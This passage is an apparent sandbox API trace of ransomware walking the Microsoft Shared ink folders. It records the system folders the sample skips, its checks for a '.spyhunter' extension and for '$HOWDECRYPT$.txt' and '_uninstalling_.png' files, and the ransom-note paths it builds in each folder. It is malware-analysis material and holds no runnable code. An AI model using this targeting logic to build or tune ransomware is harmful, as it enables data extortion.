out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.925] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.925] lstrlenW (lpString="Windows") returned 7 [0086.925] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.926] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.926] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.926] lstrlenW (lpString="System Volume Information") returned 25 [0086.926] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\.") returned 62 [0086.926] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.926] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.926] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.926] lstrlenW (lpString="Windows") returned 7 [0086.926] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.926] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.926] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.926] lstrlenW (lpString="System Volume Information") returned 25 [0086.926] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\..") returned 63 [0086.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.926] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.926] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.926] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.926] lstrlenW (lpString="Windows") returned 7 [0086.926] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.926] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.926] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.926] lstrlenW (lpString="System Volume Information") returned 25 [0086.926] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 76 [0086.926] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.926] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.926] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.926] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 76 [0086.926] GetProcessHeap () returned 0x2c0000 [0086.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372fb0 [0086.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xad8) returned 0x3867e8 [0086.927] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.927] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.927] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\$HOWDECRYPT$.txt") returned 77 [0086.927] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\$HOWDECRYPT$.txt") returned 77 [0086.927] GetProcessHeap () returned 0x2c0000 [0086.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373098 [0086.927] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xae0) returned 0x3867e8 [0086.927] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.927] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0086.927] lstrlenW (lpString="Windows") returned 7 [0086.927] lstrcmpiW (lpString1="ja-JP", lpString2="$Recycle.bin") returned 1 [0086.927] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.927] lstrcmpiW (lpString1="ja-JP", lpString2="System Volume Information") returned -1 [0086.927] lstrlenW (lpString="System Volume Information") returned 25 [0086.927] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP") returned 60 [0086.927] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0086.927] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0086.927] GetProcessHeap () returned 0x2c0000 [0086.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.927] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*") returned 62 [0086.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.928] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.928] lstrlenW (lpString="Windows") returned 7 [0086.928] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.928] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.928] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.928] lstrlenW (lpString="System Volume Information") returned 25 [0086.928] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\.") returned 62 [0086.928] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.928] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.928] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.928] lstrlenW (lpString="Windows") returned 7 [0086.928] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.928] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.928] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.928] lstrlenW (lpString="System Volume Information") returned 25 [0086.928] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\..") returned 63 [0086.928] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.928] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.928] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.928] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.928] lstrlenW (lpString="Windows") returned 7 [0086.928] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.928] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.928] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.928] lstrlenW (lpString="System Volume Information") returned 25 [0086.928] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 76 [0086.928] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.929] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.929] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.929] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 76 [0086.929] GetProcessHeap () returned 0x2c0000 [0086.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373180 [0086.929] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xae8) returned 0x3867e8 [0086.929] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.929] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.929] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\$HOWDECRYPT$.txt") returned 77 [0086.929] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\$HOWDECRYPT$.txt") returned 77 [0086.929] GetProcessHeap () returned 0x2c0000 [0086.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373268 [0086.929] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaf0) returned 0x3867e8 [0086.929] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.929] lstrcmpiW (lpString1="journal.dll", lpString2="Windows") returned -1 [0086.929] lstrlenW (lpString="Windows") returned 7 [0086.929] lstrcmpiW (lpString1="journal.dll", lpString2="$Recycle.bin") returned 1 [0086.929] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.929] lstrcmpiW (lpString1="journal.dll", lpString2="System Volume Information") returned -1 [0086.929] lstrlenW (lpString="System Volume Information") returned 25 [0086.929] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 66 [0086.929] StrStrIW (lpFirst="journal.dll", lpSrch=".spyhunter") returned 0x0 [0086.929] lstrcmpW (lpString1="journal.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.929] lstrcmpW (lpString1="journal.dll", lpString2="_uninstalling_.png") returned 1 [0086.929] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 66 [0086.929] GetProcessHeap () returned 0x2c0000 [0086.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x359580 [0086.930] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaf8) returned 0x3867e8 [0086.930] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.930] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0086.930] lstrlenW (lpString="Windows") returned 7 [0086.930] lstrcmpiW (lpString1="ko-KR", lpString2="$Recycle.bin") returned 1 [0086.930] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.930] lstrcmpiW (lpString1="ko-KR", lpString2="System Volume Information") returned -1 [0086.930] lstrlenW (lpString="System Volume Information") returned 25 [0086.930] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR") returned 60 [0086.930] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0086.930] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0086.930] GetProcessHeap () returned 0x2c0000 [0086.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.930] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*") returned 62 [0086.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.930] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.930] lstrlenW (lpString="Windows") returned 7 [0086.930] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.930] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.930] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.930] lstrlenW (lpString="System Volume Information") returned 25 [0086.930] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\.") returned 62 [0086.931] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.931] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.931] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.931] lstrlenW (lpString="Windows") returned 7 [0086.931] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.931] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.931] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.931] lstrlenW (lpString="System Volume Information") returned 25 [0086.931] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\..") returned 63 [0086.931] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.931] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.931] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.931] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.931] lstrlenW (lpString="Windows") returned 7 [0086.931] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.931] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.931] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.931] lstrlenW (lpString="System Volume Information") returned 25 [0086.931] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui") returned 76 [0086.931] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.931] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.931] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.931] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui") returned 76 [0086.931] GetProcessHeap () returned 0x2c0000 [0086.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373350 [0086.931] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xb00) returned 0x3867e8 [0086.931] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.931] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.932] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\$HOWDECRYPT$.txt") returned 77 [0086.932] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\$HOWDECRYPT$.txt") returned 77 [0086.932] GetProcessHeap () returned 0x2c0000 [0086.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373438 [0086.932] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xb08) returned 0x3867e8 [0086.932] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.932] lstrcmpiW (lpString1="lt-LT", lpString2="Windows") returned -1 [0086.932] lstrlenW (lpString="Windows") returned 7 [0086.932] lstrcmpiW (lpString1="lt-LT", lpString2="$Recycle.bin") returned 1 [0086.932] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.932] lstrcmpiW (lpString1="lt-LT", lpString2="System Volume Information") returned -1 [0086.932] lstrlenW (lpString="System Volume Information") returned 25 [0086.932] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT") returned 60 [0086.932] lstrcmpW (lpString1="lt-LT", lpString2=".") returned 1 [0086.932] lstrcmpW (lpString1="lt-LT", lpString2="..") returned 1 [0086.932] GetProcessHeap () returned 0x2c0000 [0086.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.932] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*") returned 62 [0086.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.098] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.098] lstrlenW (lpString="Windows") returned 7 [0087.098] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.098] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.098] lstrlenW (lpString="System Volume Information") returned 25 [0087.098] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\.") returned 62 [0087.098] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.098] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.098] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.098] lstrlenW (lpString="Windows") returned 7 [0087.098] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.098] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.098] lstrlenW (lpString="System Volume Information") returned 25 [0087.098] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\..") returned 63 [0087.098] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.098] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.100] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.100] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.100] lstrlenW (lpString="Windows") returned 7 [0087.101] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.101] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.101] lstrlenW (lpString="System Volume Information") returned 25 [0087.101] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui") returned 76 [0087.101] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.101] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.101] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui") returned 76 [0087.101] GetProcessHeap () returned 0x2c0000 [0087.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372ec8 [0087.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa10) returned 0x3867e8 [0087.101] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.101] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.101] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\$HOWDECRYPT$.txt") returned 77 [0087.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\$HOWDECRYPT$.txt") returned 77 [0087.101] GetProcessHeap () returned 0x2c0000 [0087.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373180 [0087.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa18) returned 0x3867e8 [0087.102] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.102] lstrcmpiW (lpString1="lv-LV", lpString2="Windows") returned -1 [0087.102] lstrlenW (lpString="Windows") returned 7 [0087.102] lstrcmpiW (lpString1="lv-LV", lpString2="$Recycle.bin") returned 1 [0087.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.102] lstrcmpiW (lpString1="lv-LV", lpString2="System Volume Information") returned -1 [0087.102] lstrlenW (lpString="System Volume Information") returned 25 [0087.102] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV") returned 60 [0087.102] lstrcmpW (lpString1="lv-LV", lpString2=".") returned 1 [0087.103] lstrcmpW (lpString1="lv-LV", lpString2="..") returned 1 [0087.103] GetProcessHeap () returned 0x2c0000 [0087.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.103] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*") returned 62 [0087.103] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.249] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.249] lstrlenW (lpString="Windows") returned 7 [0087.249] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.249] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.249] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.249] lstrlenW (lpString="System Volume Information") returned 25 [0087.249] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\.") returned 62 [0087.249] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.249] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.249] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.249] lstrlenW (lpString="Windows") returned 7 [0087.249] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.249] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.249] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.249] lstrlenW (lpString="System Volume Information") returned 25 [0087.249] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\..") returned 63 [0087.249] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.249] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.250] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.250] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.250] lstrlenW (lpString="Windows") returned 7 [0087.250] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.250] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.250] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.250] lstrlenW (lpString="System Volume Information") returned 25 [0087.250] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui") returned 76 [0087.250] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.250] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.250] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.250] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui") returned 76 [0087.250] GetProcessHeap () returned 0x2c0000 [0087.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3726a0 [0087.250] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x930) returned 0x3867e8 [0087.250] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.251] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.251] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\$HOWDECRYPT$.txt") returned 77 [0087.251] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\$HOWDECRYPT$.txt") returned 77 [0087.251] GetProcessHeap () returned 0x2c0000 [0087.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372958 [0087.251] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x938) returned 0x3867e8 [0087.251] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.251] lstrcmpiW (lpString1="micaut.dll", lpString2="Windows") returned -1 [0087.251] lstrlenW (lpString="Windows") returned 7 [0087.251] lstrcmpiW (lpString1="micaut.dll", lpString2="$Recycle.bin") returned 1 [0087.251] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.251] lstrcmpiW (lpString1="micaut.dll", lpString2="System Volume Information") returned -1 [0087.251] lstrlenW (lpString="System Volume Information") returned 25 [0087.251] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll") returned 65 [0087.251] StrStrIW (lpFirst="micaut.dll", lpSrch=".spyhunter") returned 0x0 [0087.251] lstrcmpW (lpString1="micaut.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.251] lstrcmpW (lpString1="micaut.dll", lpString2="_uninstalling_.png") returned 1 [0087.251] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll") returned 65 [0087.251] GetProcessHeap () returned 0x2c0000 [0087.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358540 [0087.251] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x940) returned 0x3867e8 [0087.251] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.251] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="Windows") returned -1 [0087.251] lstrlenW (lpString="Windows") returned 7 [0087.251] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="$Recycle.bin") returned 1 [0087.251] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.251] lstrcmpiW 